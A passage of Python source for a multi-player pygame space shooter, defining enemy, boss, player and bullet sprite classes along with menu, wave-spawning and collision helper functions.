= self.y + self.speed\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass boss_tim(pygame.sprite.Sprite):\r\n\r\n def __init__(self):\r\n self.health = boss_tim_stats['health']\r\n self.x = boss_tim_stats['x']\r\n self.y = boss_tim_stats['y']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = boss_tim_stats['image1']\r\n self.image2 = boss_tim_stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.c = count()\r\n self.speed = boss_tim_stats['fall_speed']\r\n self.costume_rate = tim_stats['costume_rate']\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.task = 'come'\r\n self.tasks = ['sweep', 'shoot', 'bombs_away', 'summon']#, 'fire_down', 'fire', 'circle']\r\n self.sweep_speed = 1\r\n self.roll = .05\r\n self.pitch = 20\r\n self.homex = (boss_tim_stats['home'])[0]\r\n self.homey = (boss_tim_stats['home'])[1]\r\n self.home_speed = 1\r\n self.rest_time = 240\r\n self.sweeps = True\r\n self.origin = [self.x,self.y]\r\n self.home = False\r\n self.n = count()\r\n self.k = count()\r\n self.bomb = count()\r\n self.bullet_count = 0\r\n self.display = False\r\n self.image3 = pygame.transform.scale(boss_tim_stats['image5'], (int(boss_tim_stats['image5'].get_width() * 2), int(boss_tim_stats['image5'].get_height() * 2)))\r\n self.image4 = pygame.transform.scale(boss_tim_stats['image3'], (int(boss_tim_stats['image3'].get_width() * 2), int(boss_tim_stats['image3'].get_height() * 2)))\r\n self.image5 = pygame.transform.scale(boss_tim_stats['image4'], (int(boss_tim_stats['image4'].get_width() * 2), int(boss_tim_stats['image4'].get_height() * 2)))\r\n self.left = False\r\n self.pivot = False\r\n self.pivot_count = 0\r\n self.sumn = count()\r\n \r\n\r\n def summon(self):\r\n if self.sumn.count(600):\r\n for x in [150, 300, 450, 600, 750, 900, 1050, 1200]:\r\n bad_guys.append(tim(1, x, -100))\r\n if self.sumn.count(1200):\r\n self.new_task()\r\n \r\n\r\n def rest(self):\r\n if self.g.count_loop(10):\r\n bad_bullets.append(bad_bullet(1,self.x,self.y,180))\r\n if self.c.count(self.rest_time):\r\n self.new_task()\r\n\r\n def shoot(self):\r\n if self.bullet_count != 200:\r\n bad_bullets.append(bad_bullet(1,self.x,self.y,random.choice(list(range(90, 270)))))\r\n self.bullet_count += 1\r\n else:\r\n self.new_task()\r\n\r\n \r\n def bombs_away(self):\r\n if self.pivot:\r\n if self.bomb.count_loop(120):\r\n bombs.append(bomb(self.x,self.y))\r\n if self.pivot_count != 4:\r\n if not self.left:\r\n self.x = self.x + 3\r\n if range_(self.x, 1300, 3):\r\n self.left = True\r\n self.pivot_count += 1\r\n else:\r\n self.x = self.x - 3\r\n if range_(self.x, 100, 3):\r\n self.left = False\r\n self.pivot_count += 1\r\n \r\n else:\r\n self.pivot = False\r\n \r\n else:\r\n if self.x != 700:\r\n if self.x > 700:\r\n self.x = self.x - 1\r\n if self.x < 700:\r\n self.x = self.x + 1\r\n else:\r\n self.new_task()\r\n\r\n\r\n def sweep(self):\r\n if self.sweeps:\r\n self.y = self.y + self.sweep_speed\r\n self.x = self.x + ((math.sin((self.y + 51) * self.roll)) * self.pitch)\r\n else:\r\n if self.n.count(1):\r\n self.home = True\r\n if self.home:\r\n if self.go_home():\r\n self.home = False\r\n self.new_task()\r\n self.k.reset_timer()\r\n self.n.reset_timer()\r\n self.x = self.homex\r\n self.y = self.homey\r\n if self.y == 700:\r\n self.sweeps = False\r\n\r\n def go_home(self):\r\n xy = glide_to(self.x, self.y, self.homex, self.homey, 2)\r\n self.x = self.x + xy[0]\r\n self.y = self.y + xy[1]\r\n return xy[2]\r\n \r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n def come(self):\r\n self.y += self.speed\r\n self.health = boss_tim_stats['health']\r\n if self.y == (boss_tim_stats['home'])[1]:\r\n self.new_task()\r\n self.display = True\r\n\r\n def new_task(self):\r\n if self.task != 'rest':\r\n self.task = 'rest'\r\n self.c.reset_timer()\r\n else:\r\n self.task = random.choice(self.tasks)\r\n self.sweeps = True\r\n self.bullet_count = 0\r\n self.left = random.choice([False, True])\r\n self.pivot = True\r\n self.pivot_count = 0\r\n self.sumn.reset_timer()\r\n\r\n def display_health(self):\r\n print(self.health)\r\n print(boss_tim_stats['health'])\r\n x = 700 - (self.image3.get_width() // 2)\r\n screen.blit(self.image3, (x, 0))\r\n if self.health == boss_tim_stats['health']:\r\n x = 700 - (self.image4.get_width() // 2)\r\n screen.blit(self.image4, (x, 0))\r\n else:\r\n x = 700 - (self.image4.get_width() // 2)\r\n print('done')\r\n scale = (boss_tim_stats['health'] - self.health) / boss_tim_stats['health']\r\n img = pygame.transform.scale(self.image4, ((int(self.image4.get_width() * scale)), int(self.image4.get_height())))\r\n screen.blit(img, (x, 0))\r\n\r\n x = 700 - (self.image5.get_width() // 2)\r\n screen.blit(self.image5, (x, -44))\r\n\r\n \r\n def loop(self):\r\n if self.task == 'come':\r\n self.come()\r\n if self.task == 'sweep':\r\n self.sweep()\r\n if self.task == 'shoot':\r\n self.shoot()\r\n if self.task == 'rest':\r\n self.rest()\r\n if self.task == 'bombs_away':\r\n self.bombs_away()\r\n if self.task == 'summon':\r\n self.summon()\r\n if self.display:\r\n self.display_health()\r\n if self.d.count_loop(self.costume_rate):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n## if self.g.count_loop(self.shoot_rate):\r\n## bad_bullets.append(bad_bullet(1,self.x + 45,self.y + 80,180))\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass time_out():\r\n def __init__(self, player):\r\n self.old_wave_count = wave_count\r\n self.player = player\r\n self.waves_waited = 0\r\n\r\n def loop(self):\r\n if self.old_wave_count < wave_count:\r\n self.waves_waited += 1\r\n self.old_wave_count = wave_count\r\n if self.waves_waited == time_out_time:\r\n good_guys.append(self.player)\r\n time_outs.remove(self)\r\n if self.player.player_num == 1:\r\n create_text(35, 0, 100, 'P-1: %s' % (time_out_time - self.waves_waited))\r\n if self.player.player_num == 2:\r\n create_text(35, 0, 200, 'P-2: %s' % (time_out_time - self.waves_waited))\r\n if self.player.player_num == 3:\r\n create_text(35, 0, 300, 'P-3: %s' % (time_out_time - self.waves_waited))\r\n if self.player.player_num == 4:\r\n create_text(35, 0, 400, 'P-4: %s' % (time_out_time - self.waves_waited))\r\n\r\n\r\nclass count():\r\n\r\n def __init__(self):\r\n self.timer = 0\r\n\r\n def count_loop(self, timer):\r\n if self.timer == timer:\r\n self.timer = 0\r\n return True\r\n else:\r\n self.timer = self.timer + 1\r\n\r\n def count(self, timer):\r\n if self.timer == timer:\r\n return True\r\n else:\r\n self.timer = self.timer + 1\r\n\r\n def reset_timer(self):\r\n self.timer = 0\r\n\r\n\r\nclass player(pygame.sprite.Sprite):\r\n\r\n #sprite variables\r\n \r\n\r\n def __init__(self, num, skin, cntr, x, y, gun):\r\n self.skins = player_stats['skins']\r\n self.controls = player_stats['controls']\r\n self.image1 = ((self.skins[skin])[0])\r\n self.image2 = ((self.skins[skin])[1])\r\n self.player_num = num\r\n self.x = x\r\n self.y = y\r\n self.player_speed = player_stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.chosen_image = self.image1\r\n self.player_controls = cntr\r\n self.d = count()\r\n self.g = count()\r\n self.gun_type = gun\r\n self.gun_rate = (bullets[self.gun_type])[3]\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n \r\n def hit(self):\r\n if self in good_guys:\r\n explosions.append(explosion(self.x, self.y))\r\n good_guys.remove(self)\r\n self.x = 700\r\n self.y = 400\r\n time_outs.append(time_out(self))\r\n\r\n def loop(self):\r\n if not(((self.controls[self.player_controls])[1]) in events and self.y >= edges[0]):\r\n if self.y >= 0:\r\n if game_on:\r\n self.y = self.y - drift_speed\r\n if ((self.controls[self.player_controls])[0]) in events and self.y >= edges[1]:\r\n self.y = self.y - self.player_speed\r\n if ((self.controls[self.player_controls])[1]) in events and self.y <= edges[0]:\r\n self.y = self.y + self.player_speed + drift_speed\r\n if ((self.controls[self.player_controls])[2]) in events and self.x >= edges[3]:\r\n self.x = self.x - self.player_speed\r\n if ((self.controls[self.player_controls])[3]) in events and self.x <= edges[2]:\r\n self.x = self.x + self.player_speed\r\n if self.d.count_loop(player_stats['costume_rate']):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n elif self.chosen_image == self.image2:\r\n self.chosen_image = self.image1\r\n if game_on:\r\n if self.g.count_loop(self.gun_rate):\r\n good_bullets.append(player_bullet(self.gun_type,self.x,self.y))\r\n if self.gun_type == 4:\r\n for x in range(player_stats['shotgun_count'] - 1):\r\n good_bullets.append(player_bullet(self.gun_type,self.x,self.y))\r\n\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\nclass tim(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, x, y):\r\n self.health = tim_stats['health']\r\n self.x = x\r\n self.y = y\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = tim_stats['image1']\r\n self.image2 = tim_stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.speed = tim_stats['speed']\r\n self.pitch = tim_stats['pitch']\r\n self.roll = tim_stats['roll']\r\n self.shoot_rate = tim_stats['shoot_rate']\r\n self.costume_rate = tim_stats['costume_rate']\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n\r\n \r\n def loop(self):\r\n if self.y >= 1000:\r\n wave_to_do_list.append('tim')\r\n bad_guys.remove(self)\r\n \r\n self.y = self.y + self.speed\r\n self.x = self.x + ((math.cos(self.y * self.roll)) * self.pitch)\r\n if self.d.count_loop(self.costume_rate):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n if self.g.count_loop(self.shoot_rate):\r\n bad_bullets.append(bad_bullet(1,self.x,self.y,180))\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass bob(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, y, direction):\r\n self.health = bob_stats['health']\r\n self.y = y\r\n self.speed = bob_stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = bob_stats['image1']\r\n self.image2 = bob_stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.pitch = bob_stats['pitch']\r\n self.roll = bob_stats['roll']\r\n #self.pitch2 = 2\r\n #self.roll2 = .01\r\n self.costume_speed = bob_stats['costume_rate']\r\n self.body_length = bob_stats['length']\r\n self.body_distance = bob_stats['distance']\r\n self.direction = direction\r\n if self.direction == 'left':\r\n self.x = 1500\r\n if self.direction == 'right':\r\n self.x = -100\r\n self.image1 = pygame.transform.rotate(self.image1, 180)\r\n self.image2 = pygame.transform.rotate(self.image2, 180)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [self.x,self.y]\r\n\r\n\r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n\r\n\r\n \r\n def loop(self):\r\n #angle = 0\r\n if self.x >= 1700 or self.x <= -300:\r\n wave_to_do_list.append('bob')\r\n bad_guys.remove(self)\r\n if self.direction == 'left':\r\n self.x = self.x - self.speed\r\n if self.direction == 'right':\r\n self.x = self.x + self.speed\r\n self.y = self.y + ((math.cos(self.x * self.roll)) * self.pitch)\r\n if self.d.count_loop(self.costume_speed):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n if self.g.count_loop(self.body_distance):\r\n if self.direction == 'left':\r\n balls.append(bob_body(self.x + 10, self.y, self.body_length))\r\n if self.direction == 'right':\r\n balls.append(bob_body(self.x - 10, self.y, self.body_length))\r\n #angle = angle + ((math.cos(self.x * self.roll2)) * self.pitch2)\r\n #self.chosen_image = pygame.transform.rotate(self.chosen_image, angle)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\nclass bob_body(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y, length):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.chosen_image = bob_body_stats['image1']\r\n self.x = x\r\n self.y = y\r\n self.length = length\r\n self.turn_speed = 1\r\n self.d = count()\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n \r\n\r\n def loop(self):\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n if self.d.count(self.length):\r\n balls.remove(self)\r\n\r\n\r\n \r\nclass explosion(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = explosion_stats['image1']\r\n self.x = x\r\n self.y = y\r\n self.length = explosion_stats['length']\r\n self.turn_speed = 1\r\n self.d = count()\r\n\r\n \r\n\r\n def loop(self):\r\n screen.blit(self.image1, (self.x, self.y))\r\n if self.d.count(self.length):\r\n if self in explosions:\r\n explosions.remove(self)\r\n \r\n \r\n\r\nclass lill_tim(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, x, y):\r\n if skin == 1:\r\n self.stats = lill_tim_stats\r\n else:\r\n self.stats = lill_tim2_stats\r\n self.health = self.stats['health']\r\n self.x = x\r\n self.y = y\r\n self.speed = self.stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = self.stats['image1']\r\n self.image2 = self.stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.pitch = self.stats['pitch']\r\n self.roll = self.stats['roll']\r\n self.skin = skin\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n \r\n\r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n\r\n def loop(self):\r\n if self.y >= 1000:\r\n if self.skin == 1:\r\n wave_to_do_list.append('lill_tim')\r\n else:\r\n wave_to_do_list.append('lill_tim2')\r\n bad_guys.remove(self)\r\n self.y = self.y + self.speed\r\n if self.skin == 2:\r\n self.x = self.x + ((math.cos(self.y * .025)) * self.pitch)\r\n if self.d.count_loop(self.stats['costume_rate']):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass bad_bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, x, y, angle):\r\n self.skins = {1 : ['bad_bullet.png',2,10], 2 : ['player2-1.png',0,15] }\r\n self.chosen_image = ((self.skins[skin])[0])\r\n self.x = x\r\n self.y = y\r\n self.speed = ((self.skins[skin])[1])\r\n self.accuracy = ((self.skins[skin])[2])\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = pygame.image.load(self.chosen_image)\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.angle_possibilities = (list(range((self.accuracy * -1), (self.accuracy + 1))))\r\n self.angle = random.choice(self.angle_possibilities)\r\n self.angle = self.angle + angle\r\n self.chosen_image = pygame.transform.rotate(self.chosen_image, self.angle)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n\r\n \r\n def hit(self):\r\n if self in bad_bullets:\r\n bad_bullets.remove(self)\r\n\r\n def loop(self):\r\n if self.y > 900:\r\n bad_bullets.remove(self)\r\n self.y = self.y + self.speed\r\n self.y_add = (self.speed*math.sin(math.radians(self.angle + 90)))\r\n self.x_add = (self.speed*math.cos(math.radians(self.angle + 90)))\r\n self.x = self.x + self.x_add\r\n self.y = self.y - self.y_add\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n \r\n\r\n\r\n\r\n \r\nclass player_bullet(pygame.sprite.Sprite):\r\n\r\n #sprite variables\r\n \r\n\r\n def __init__(self, num, x, y):\r\n self.bullet = num\r\n self.chosen_image = (bullets[num])[0]\r\n self.x = x\r\n self.y = y\r\n self.bullet_speed = (bullets[num])[2]\r\n pygame.sprite.Sprite.__init__(self)\r\n self.chosen_image = pygame.image.load(self.chosen_image)\r\n self.d = count()\r\n self.accuracy = (bullets[num])[1]\r\n self.angle_possibilities = (list(range((self.accuracy * -1), (self.accuracy + 1))))\r\n self.angle = random.choice(self.angle_possibilities)\r\n pygame.transform.rotate(self.chosen_image, self.angle)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n\r\n def hit(self):\r\n if self.bullet != 3:\r\n if self in good_bullets:\r\n good_bullets.remove(self)\r\n\r\n\r\n def loop(self):\r\n if self.y < -10:\r\n good_bullets.remove(self)\r\n #self.bullet_y = self.bullet_y - self.bullet_speed\r\n self.yl = (self.bullet_speed*math.sin(math.radians(self.angle + 90)))\r\n self.xl = (self.bullet_speed*math.cos(math.radians(self.angle + 90)))\r\n self.x = self.x + self.xl\r\n self.y = self.y - self.yl\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n \r\n \r\nclass stars(pygame.sprite.Sprite):\r\n\r\n #sprite variables\r\n \r\n\r\n def __init__(self):\r\n self.map_x = 0\r\n self.map_y = -8001\r\n pygame.sprite.Sprite.__init__(self)\r\n \r\n self.scale_factor = 2.3\r\n \r\n global map_count \r\n if map_count == 0:\r\n self.map_y = -7200\r\n \r\n map_count = 1\r\n\r\n\r\n def loop(self):\r\n global map_count\r\n self.map_y = self.map_y + .5\r\n screen.blit(map_image, (self.map_x, self.map_y))\r\n if self.map_y == 0:\r\n \r\n map_count = map_count + 1\r\n \r\n effects.append(stars())\r\n if self.map_y >= 800:\r\n effects.remove(self)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#functions\r\n\r\ndef maskFromSurface(surface, threshold=127):\r\n return pygame.mask.from_surface(surface, threshold)\r\n\r\ndef clicked(image, x, y):\r\n if mouse_x > x:\r\n if mouse_x < (image.get_width() + x):\r\n if mouse_y > y:\r\n if mouse_y < (image.get_height() + y):\r\n if 'click' in events:\r\n events.remove('click')\r\n return(True)\r\n \r\ndef create_text(size, x, y, text):\r\n font = pygame.font.Font(None, size)\r\n size = font.size(text)\r\n ren = font.render(text, 0, fg, bg)\r\n screen.blit(ren, (x, y))\r\n return ren\r\n \r\n \r\ndef ask_player():\r\n global load_stage, preset, start_cycle, which, last_clicked, last_clicked2, last_clicked3\r\n global wave_count, progress, last_preset, game_ready\r\n pygame.init()\r\n create_text(100, 436, 0, name)\r\n if load_stage == 1:\r\n if clicked(create_text(150, 360, 350, 'Click To Play'), 360, 350):\r\n load_stage = load_stage + 1\r\n if load_stage == 2:\r\n if len(last_preset) != 0:\r\n if clicked(create_text(150, 360, 250, 'Last Settings'), 360, 250):\r\n load_stage = load_stage + 3\r\n preset = list(last_preset)\r\n if clicked(create_text(150, 360, 450, 'New Settings'), 360, 450):\r\n load_stage = load_stage + 1\r\n else:\r\n load_stage = load_stage + 1\r\n if load_stage == 3:\r\n if clicked(create_text(150, 475, 100, '1 Player'), 475, 100):\r\n load_stage = load_stage + 1\r\n preset.append(1)\r\n if clicked(create_text(150, 475, 250, '2 Player'), 475, 250):\r\n load_stage = load_stage + 1\r\n preset.append(2)\r\n if clicked(create_text(150, 475, 400, '3 Player'), 475, 400):\r\n load_stage = load_stage + 1\r\n preset.append(3)\r\n if clicked(create_text(150, 475, 550, '4 Player'), 475, 550):\r\n load_stage = load_stage + 1\r\n preset.append(4)\r\n if load_stage == 4:\r\n create_text(100, 520, 100, ('Player %s' % progress))\r\n y = 600\r\n x = 80\r\n space = 30\r\n scale_factor = 2\r\n if sgt.count_loop(10):\r\n \r\n if start_cycle == True:\r\n start_cycle = False\r\n which = 1\r\n else:\r\n start_cycle = True\r\n which = 0\r\n create_text(85, 80, 500, 'Choose Ship')\r\n create_text(85, 80, 100, 'Choose Gun')\r\n for t in (player_stats['skins']).keys():\r\n image = ((player_stats['skins'])[t])[which]\r\n new_width = int(image.get_width() * scale_factor)\r\n new_height = int(image.get_height() * scale_factor)\r\n image = pygame.transform.scale(image, (new_width, new_height))\r\n new_x = x + ((space + new_width) * (t - 1))\r\n screen.blit((image), (new_x, y))\r\n if t not in skin_l:\r\n screen.blit(pygame.transform.scale(cross_out, (new_width, new_height)), (new_x, y))\r\n else:\r\n if clicked(image, new_x, y):\r\n last_clicked = t\r\n if last_clicked == t:\r\n screen.blit(pygame.transform.scale(check_mark, (new_width, new_height)), (new_x, y))\r\n create_text(85, 1000, 100, 'Choose Keys')\r\n if clicked(create_text(60, 100, 200, '50 Cal'), 100, 200):\r\n last_clicked2 = 1\r\n if clicked(create_text(60, 100, 250, 'Chain Gun'), 100, 250):\r\n last_clicked2 = 2\r\n if clicked(create_text(60, 100, 300, 'Rail Gun'), 100, 300):\r\n last_clicked2 = 3\r\n if clicked(create_text(60, 100, 350, 'Shot Gun'), 100, 350):\r\n last_clicked2 = 4\r\n gun_dict = {1 : 162,2 : 212,3 : 262,4 : 312}\r\n for x in (gun_dict.keys()):\r\n if x == last_clicked2:\r\n screen.blit(pygame.transform.scale(check_mark, (new_width, new_height)), (100, gun_dict[x]))\r\n \r\n wasd = create_text(60, 1000, 200, 'WASD')\r\n if 'wasd' in controls_l:\r\n if clicked(wasd, 1000, 200):\r\n last_clicked3 = 'wasd'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (wasd.get_width(), wasd.get_height())), (1000, 200))\r\n tfgh = create_text(60, 1000, 250, 'TFGH')\r\n if 'tfgh' in controls_l:\r\n if clicked(tfgh, 1000, 250):\r\n last_clicked3 = 'tfgh'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (tfgh.get_width(), tfgh.get_height())), (1000, 250))\r\n ijkl = create_text(60, 1000, 300, 'IJKL')\r\n if 'ijkl' in controls_l:\r\n if clicked(ijkl, 1000, 300):\r\n last_clicked3 = 'ijkl'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (ijkl.get_width(), ijkl.get_height())), (1000, 300))\r\n arrow = create_text(60, 1000, 350, 'Arrows')\r\n if 'arrow' in controls_l:\r\n if clicked(arrow, 1000, 350):\r\n last_clicked3 = 'arrow'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (arrow.get_width(), arrow.get_height())), (1000, 350))\r\n controls_dict = {'wasd' : 162, 'tfgh' : 212, 'ijkl' : 262, 'arrow' : 312}\r\n for x in (controls_dict.keys()):\r\n if x == last_clicked3:\r\n screen.blit(pygame.transform.scale(check_mark, (new_width, new_height)), (1000, controls_dict[x]))\r\n if clicked(create_text(200, 900, 500, 'Done'), 900, 500):\r\n if progress == preset[0]:\r\n load_stage = load_stage + 1\r\n else:\r\n progress = progress + 1\r\n if last_clicked == None:\r\n preset.append(skin_l[0])\r\n skin_l.remove(skin_l[0])\r\n else:\r\n preset.append(last_clicked)\r\n skin_l.remove(last_clicked)\r\n if last_clicked2 == None:\r\n preset.append(gun_l[0])\r\n else:\r\n preset.append(last_clicked2)\r\n if last_clicked3 == None:\r\n preset.append(controls_l[0])\r\n controls_l.remove(controls_l[0])\r\n else:\r\n preset.append(last_clicked3)\r\n controls_l.remove(last_clicked3)\r\n last_clicked = None\r\n last_clicked2 = None\r\n last_clicked3 = None\r\n if load_stage == 5:\r\n for k in waves.keys():\r\n if k <= 10:\r\n y_l = 100\r\n else: \r\n y_1 = 200\r\n x_l = k * 100\r\n if clicked(create_text(100, x_l, y_l, str(k)), x_l, y_l):\r\n wave_count = k - 1\r\n #if len(last_preset) == 0:\r\n last_preset = list(preset)\r\n game_ready = True\r\n \r\n \r\ndef kill():\r\n global kills\r\n kills = kills + 1\r\n\r\ndef stop_watch():\r\n global hours, minutes, seconds\r\n seconds = seconds + 1\r\n if seconds == 60:\r\n seconds = 0\r\n minutes = minutes + 1\r\n if minutes == 60:\r\n minutes = 0\r\n hours = hours + 1\r\n \r\ndef damage_(damages):\r\n global damage\r\n damage = damage + damages\r\n\r\ndef touching(s1,s2):\r\n offset = [(int(s1.origin[0] - s2.origin[0]) // 1), (int(s1.origin[1] - s2.origin[1]) // 1)]\r\n if s2.mask.overlap_area(s1.mask, (offset)) != 0:\r\n return True\r\n \r\ndef run_wave():\r\n global wave_done\r\n global wave_count\r\n if len(wave_to_do_list) == 0:\r\n wave_timer1.reset_timer()\r\n wave_timer2.reset_timer()\r\n if len(wave_to_do_list) == 0 and len(boss_to_do_list) == 0 and len(bad_guys) == 0 and len(bombs) == 0:\r\n wave_done = True\r\n if wave_count != waves.keys():\r\n wave_count = wave_count + 1\r\n wave_()\r\n print(waves[wave_count])\r\n f = (waves[wave_count])[2]\r\n g = (waves[wave_count])[3]\r\n h = (waves[wave_count])[4]\r\n v = (waves[wave_count])[5]\r\n j = (waves[wave_count])[6]\r\n b = (waves[wave_count])[7]\r\n \r\n for x in range(f):\r\n wave_to_do_list.append('lill_tim')\r\n for x in range(g):\r\n wave_to_do_list.append('lill_tim2')\r\n for x in range(h):\r\n wave_to_do_list.append('tim')\r\n for x in range(j):\r\n wave_to_do_list.append('bob')\r\n for x in range(v):\r\n wave_to_do_list.append('bomb')\r\n if b != None:\r\n boss_to_do_list.append(b)\r\n \r\n \r\n if wave_timer1.count(((60 * (waves[wave_count])[1]))):\r\n wave_done = False\r\n if not wave_done:\r\n if wave_timer2.count_loop((waves[wave_count])[0]):\r\n p = random.choice(wave_to_do_list)\r\n if p == 'tim':\r\n x = random.choice(list(range(0, 1400)))\r\n bad_guys.append(tim(1,x,-100)) \r\n if p == 'lill_tim':\r\n x = random.choice(list(range(0, 1400)))\r\n bad_guys.append(lill_tim(1,x,-100))\r\n if p == 'lill_tim2':\r\n x = random.choice(list(range(0, 1400)))\r\n bad_guys.append(lill_tim(2,x,-100))\r\n if p == 'bob':\r\n y = random.choice(list(range(0, 800)))\r\n direction = random.choice(('left','right'))\r\n bad_guys.append(bob(1,y,direction))\r\n if p == 'bomb':\r\n x = random.choice(list(range(0, 1400)))\r\n bombs.append(bomb(x,-100))\r\n wave_to_do_list.remove(p)\r\n if len(wave_to_do_list) == 0 and len(bad_guys) == 0 and len(bombs) == 0:\r\n if len(boss_to_do_list) == 1:\r\n if boss_to_do_list[0] == 'boss_tim':\r\n bad_guys.append(boss_tim())\r\n print('added boss')\r\n boss_to_do_list.remove(boss_to_do_list[0])\r\n \r\n\r\ndef wave_():\r\n global wave\r\n wave = wave + 1\r\n \r\n\r\ndef start_button():\r\n global game_on\r\n if 'space' in events or clicked(create_text(100, 350, 390, 'Ready!'), 350, 390):\r\n game_on = True\r\n \r\ndef game_over():\r\n pygame.init()\r\n font1 = pygame.font.Font(None, 100)\r\n text1 = \"Game Over\"\r\n size1 = font1.size(text1)\r\n ren1 = font1.render(text1, 0, fg, bg)\r\n screen.blit(ren1, (350, 390))\r\n\r\ndef search_events():\r\n global mouse_x\r\n global mouse_y\r\n keys_dict = {'space' : pygame.K_SPACE,\r\n 'up' : pygame.K_UP,\r\n 'down' : pygame.K_DOWN,\r\n 'left' : pygame.K_LEFT,\r\n 'right' : pygame.K_RIGHT,\r\n 'tab' : pygame.K_TAB,\r\n 'clear' : pygame.K_CLEAR,\r\n 'return' : pygame.K_RETURN,\r\n '=' : pygame.K_EQUALS,\r\n '`' : pygame.K_BACKQUOTE,\r\n ']' : pygame.K_RIGHTBRACKET,\r\n '.' : pygame.K_PERIOD,\r\n 'delete' : pygame.K_DELETE,\r\n '/' : pygame.K_SLASH,\r\n '-' : pygame.K_MINUS,\r\n '[' : pygame.K_LEFTBRACKET,\r\n ',' : pygame.K_COMMA,\r\n ';' : pygame.K_SEMICOLON,\r\n 'backspace' : pygame.K_BACKSPACE,\r\n '1' : pygame.K_1,\r\n '2' : pygame.K_2,\r\n '3' : pygame.K_3,\r\n '4' : pygame.K_4,\r\n '5' : pygame.K_5,\r\n '6' : pygame.K_6,\r\n '7' : pygame.K_7,\r\n '8' : pygame.K_8,\r\n '9' : pygame.K_9,\r\n '0' : pygame.K_0,\r\n 'q' : pygame.K_q,\r\n 'w' : pygame.K_w,\r\n 'e' : 